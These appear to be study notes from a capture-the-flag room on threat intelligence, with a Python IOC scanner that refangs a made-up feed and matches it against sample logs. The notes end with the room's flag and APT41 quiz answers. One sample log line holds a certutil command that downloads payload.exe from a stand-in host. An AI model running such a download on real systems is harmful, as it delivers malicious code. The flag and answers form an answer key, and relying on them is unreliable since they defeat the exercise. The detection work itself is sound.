Threat Intelligence is information attributed to an adversary (who they are, whom they target, how they operate), commonly used by defenders to aid in detection measures.
-can also be used in adversary emulation
-collection of indicators of compromise (IOCs): domains, IPs, file hashes, strings, etc.
-Red team will use threat intelligence to craft tooling and to modify traffic and behaviour to emulate the target adversary
-TTP mapping: aids the red team in planning an engagement to emulate an adversary (target industry, employed attack vectors, country of origin and other factors)
-sources of threat intelligence: MITRE ATT&CK, Mandiant Advantage, Ontic, CrowdStrike Falcon
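The notes above say defenders turn collected IOCs (domains, IPs, hashes, strings) into detections. The example below, added here and not part of the room or of any vendor's tooling, shows the two steps a practitioner actually has to get right: normalising a feed that arrives defanged (hxxp, [.]) and in mixed case, and matching indicators against log lines with boundaries so that a partial IP or hash does not fire. The feed, the log lines and the MD5 value are constructed for the example and attribute nothing to anyone.

```python
import re

# Constructed IOC feed, in the defanged, mixed-case form feeds usually ship in.
# Every value here is made up for the example.
IOC_FEED = """
domain: Update[.]Example-Cdn[.]Com
ip: 203[.]0[.]113[.]42
url: hxxps://update[.]example-cdn[.]com/certutil/payload.exe
md5: D41D8CD98F00B204E9800998ECF8427E
string: MESSAGETAP
"""

# Constructed log lines (DNS, proxy, process, file, flow events) to scan.
SAMPLE_LOGS = [
    '2024-05-01T10:00:01Z dns query=update.example-cdn.com client=10.0.0.5',
    '2024-05-01T10:00:02Z proxy GET https://update.example-cdn.com/certutil/payload.exe dst=203.0.113.42',
    '2024-05-01T10:00:03Z proc cmd="certutil.exe -urlcache -split -f https://update.example-cdn.com/certutil/payload.exe C:\\Temp\\p.exe"',
    '2024-05-01T10:00:04Z file hash_md5=d41d8cd98f00b204e9800998ecf8427e path=C:\\Temp\\p.exe',
    '2024-05-01T10:00:05Z dns query=cdn.example.com client=10.0.0.7',
    '2024-05-01T10:00:06Z flow dst=203.0.113.4 proto=tcp',
]

# Indicator types that are matched case-insensitively; raw strings keep their case.
CASE_INSENSITIVE = {"domain", "ip", "url", "md5", "sha1", "sha256"}

# Characters that could legitimately continue an indicator. A hit must not be
# bordered by one of them, so 203.0.113.42 does not fire on 203.0.113.421.
BOUNDARY = r"[A-Za-z0-9.\-]"


def refang(value):
    """Undo common defanging so the IOC looks the way it will appear in logs."""
    value = value.strip()
    value = value.replace("[.]", ".").replace("(.)", ".")
    value = re.sub(r"^hxxp", "http", value, flags=re.IGNORECASE)
    return value


def parse_feed(text):
    """Parse 'type: value' lines into {type: set(normalised values)}."""
    iocs = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        kind, _, raw = line.partition(":")
        kind = kind.strip().lower()
        value = refang(raw)
        if kind in CASE_INSENSITIVE:
            value = value.lower()
        iocs.setdefault(kind, set()).add(value)
    return iocs


def compile_iocs(iocs):
    """Build one bounded regex per indicator: [(kind, value, pattern), ...]."""
    compiled = []
    for kind, values in iocs.items():
        flags = re.IGNORECASE if kind in CASE_INSENSITIVE else 0
        for value in sorted(values):
            pattern = re.compile(
                "(?<!" + BOUNDARY + ")" + re.escape(value) + "(?!" + BOUNDARY + ")",
                flags,
            )
            compiled.append((kind, value, pattern))
    return compiled


def scan_logs(log_lines, iocs):
    """Return [(line_number, kind, value), ...] for every indicator seen."""
    hits = []
    compiled = compile_iocs(iocs)
    for number, line in enumerate(log_lines, 1):
        for kind, value, pattern in compiled:
            if pattern.search(line):
                hits.append((number, kind, value))
    return hits


if __name__ == "__main__":
    for number, kind, value in scan_logs(SAMPLE_LOGS, parse_feed(IOC_FEED)):
        print(f"line {number}: {kind} {value}")
```

Against the constructed logs the scanner reports seven hits across lines 1 to 4 and nothing on lines 5 and 6: cdn.example.com is not the feed's domain, and the flow to 203.0.113.4 is a different host from 203.0.113.42, which is exactly the false positive a naive substring check would produce. The MESSAGETAP string IOC is kept case-sensitive and never matches here, which is the intended behaviour for a malware family name rather than a network indicator.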
THM{7HR347_1N73L_12 _4w35om3}
What web shell is APT 41 known to use? -ASPXSpy
What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers? -certutil
What tool does APT 41 use to mine and monitor SMS traffic? -MESSAGETAP